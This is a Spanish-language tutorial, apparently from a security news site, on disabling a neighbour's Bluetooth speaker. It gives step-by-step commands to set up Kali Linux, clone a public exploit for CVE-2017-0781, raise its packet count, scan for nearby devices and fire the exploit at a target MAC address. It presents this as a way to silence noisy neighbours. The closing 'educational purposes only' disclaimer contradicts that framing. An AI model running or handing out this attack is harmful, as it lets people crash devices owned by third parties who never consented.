Todos hemos lidiado con vecinos molestos que no dejan de escuchar música a un alto volumen, incluso de madrugada y gracias a que la mayoría de los hogares ahora cuenta con bocinas Bluetooth.
Cuando la amabilidad no es suficiente para que los vecinos dejen de hacer ruido, puede recurrir a un método más asertivo. En esta ocasión, los especialistas en seguridad en redes del Instituto Internacional de Seguridad Cibernética (IICS) le mostrarán cómo estropear el funcionamiento de una bocina Bluetooth y otros dispositivos que dependen del uso de este protocolo.
Iniciar con el proceso
Acorde a los expertos en seguridad en redes, antes de comenzar el ataque deberá instalar Kali Linux (https://www.kali.org/downloads/).
- Para que el exploit funcione correctamente, debe instalar las siguientes dependencias:
apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
- A continuación actualizaremos pwntools:
pip install --upgrade pip
pip install --upgrade pwntools
- Posteriormente, los expertos en seguridad en redes nos mencionan que habrá que instalar las bibliotecas necesarias para trabajar con Bluetooth
apt-get install bluetooth libbluetooth-dev
pip install pybluez
- Descargue el exploit utilizando el siguiente comando:
git clone https://github.com/ojasookert/CVE-2017-0781
- En el archivo de Python descargado, los expertos en seguridad en redes recomiendan corregir la cantidad de paquetes cambiando la variable de conteo a un mínimo de 30 mil
Uso de la herramienta
- Escaneamos la conexión Bluetooth con el siguiente comando:
hcitool scan
- Seleccione el dispositivo, copie su dirección MAC y escriba el comando:
python CVE-2017-0781.py TARGET = <MAC address>
Al ejecutar este comando se enviarán múltiples solicitudes al dispositivo afectado, lo que generará un desbordamiento de búfer y evitará que la bocina Bluetooth funcione correctamente, solucionando así sus problemas por vecinos escandalosos.
Los expertos de IICS recomiendan utilizar esta técnica solo en entornos controlados y, de ser posible, con autorización expresa del resto de personas involucradas. Este artículo fue elaborado con fines enteramente didácticos. Los expertos del IICS recomiendan utilizar esta técnica solo en entornos controlados y, si es posible, con la autorización del resto de personas involucradas. Este tutorial es solo para fines educativos y de investigación. No haga un mal uso de esta información.
Trabajando como arquitecto de soluciones de ciberseguridad, Alisa se enfoca en la protección de datos y la seguridad de datos empresariales. Antes de unirse a nosotros, ocupó varios puestos de investigador de ciberseguridad dentro de una variedad de empresas de seguridad cibernética. También tiene experiencia en diferentes industrias como finanzas, salud médica y reconocimiento facial.
Envía tips de noticias a info@noticiasseguridad.com o www.instagram.com/iicsorg/
También puedes encontrarnos en Telegram www.t.me/noticiasciberseguridad